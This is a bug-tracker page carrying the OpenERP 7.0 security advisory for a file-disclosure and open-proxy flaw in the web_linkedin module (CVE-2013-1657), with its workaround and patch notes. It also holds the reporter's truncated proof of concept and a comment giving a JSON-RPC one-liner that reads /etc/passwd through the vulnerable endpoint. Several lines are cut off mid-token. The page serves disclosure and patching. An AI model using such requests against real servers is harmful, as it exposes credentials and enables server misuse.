[7.0] Remote File/URL Access via "LinkedIn Integration" module + privilege escalation
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Odoo Addons (MOVED TO GITHUB) |
Fix Released
|
Critical
|
OpenERP R&D Web Team |
Bug Description
== SECURITY ADVISORY ==
Title: Remote File/URL Access via "LinkedIn Integration" module
Affects: OpenERP 7.0 only
Component: OpenERP Addons
Module: web_linkedin
Credit: Bastian Ike
CVE ID: 2013-1657 (to be published)
I. Confidentiality
The content of this security advisory was released early on 2013-02-11 to
subscribers of an OpenERP Enterprise contract (OE). In the mean time, this
issue was not disclosed or discussed on public channels.
II. Background
OpenERP is remotely accessible using remote procedure call (RPC) protocols, in
order to communicate with the OpenERP user interface or with external systems.
These RPC interfaces grant access to the business logic provided by OpenERP
modules (also known as Apps or addons). This allows calling the business logic
of OpenERP using external programs, including with other parameters than those
typically used by the OpenERP user interface.
OpenERP 7.0 comes with a new "LinkedIn Integration" module (web_linkedin) that
can automatically fill in new Contact details based on the information
published on LinkedIn.
III. Problem Description
The web_linkedin module did not properly verify the parameters passed to one
of its RPC methods, allowing an attacker to remotely access local files on the
server on which OpenERP is running, or to relay HTTP requests to arbitrary URLs.
OpenERP 7.0 systems where the web_linkedin module is present but not installed
may also be vulnerable.
IV. Impact
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
An attacker could pass a specially-crafted JSON-RPC request to the vulnerable
method and ask for the contents of any local file or remote URL, with or
without being authenticated.
Local files requested through this vulnerability may contain sensitive
information such as passwords that could allow the user to gain elevated
privileges on OpenERP or on the server machine itself.
The attacker could also use the OpenERP system as an "open web proxy",
effectively avoiding network traceability when accessing or abusing other websites.
Exploiting this vulnerability only requires remote network access to the
vulnerable OpenERP system.
OpenERP S.A. is not aware of any malicious use of this vulnerability yet.
V. Workaround
Deleting the web_linkedin directory in the local modules repository then
restarting the OpenERP server will prevent exploiting this vulnerability, but
may damage your installation. This option should only be used if applying the
patch or updating the installation is truly impossible, and must be performed
by personnel experienced with OpenERP administration.
Please also note that:
- 7.0 systems where the web_linkedin module is not installed may also be
vulnerable as long as the web_linkedin module is present in the local modules
(i.e. in one of the `addons_path` entries).
- Systems based on the OpenERP 7.0 Windows All-In-One installer are not
vulnerable unless the web_linkedin module was installed on at least one
database. On such installations modules are only downloaded when they are
installed.
- All OpenERP Online servers have been patched as soon as the correction was
available.
VI. Solution
Apply the attached patch, or upgrade to an OpenERP 7.0 version after the
correction date, either via Bazaar or by downloading the latest version from
https:/
To apply the patch, change into the root directory of your addons installation,
then execute the patch command, such as:
patch -p0 -f < /path/to/
VII. Correction details
The following list contains the revision number of 7.0 series of
`openobject-addons' after which the vulnerability is corrected.
-------
- 7.0 series revno: 8669 revision-id: <email address hidden>
== ORIGINAL DESCRIPTION FROM REPORTER ==
The web_linkedin addon in OpenERP 7 contains a critical security issue.
class Binary(
_cp_path = "/web_linkedin/
@openerp.
def url2binary(self, req,url):
bfile = urllib2.
return base64.
Anyone can just open /web_linkedin/
This let's an attacker abuse the OpenERP Server to hide his IP from attacks (like DDOS) to other servers or let him access internal resources inside the companys network.
PoC:
In [1]: import jsonrpclib
In [2]: import base64
In [3]: base64.
Out[3]: '<html>
I'm not sure if openerp-web is the right project, if not, please move it.
If you need further information please let me know (here or via skype: bastian.ike).
CVE References
Changed in openobject-addons: | |
importance: | High → Critical |
summary: |
- web_linkedin security issue: open proxy + privilege escalation + Remote File/URL Access via "LinkedIn Integration" module + privilege + escalation |
description: | updated |
information type: | Private Security → Public Security |
description: | updated |
information type: | Public Security → Private Security |
information type: | Private Security → Public Security |
Let's you btw. also access local files via file://: b64decode( jsonrpclib. Server( 'http:// oe7:8069/ web_linkedin/ binary/ url2binary' ).call( url="file:/ //etc/passwd" ))
base64.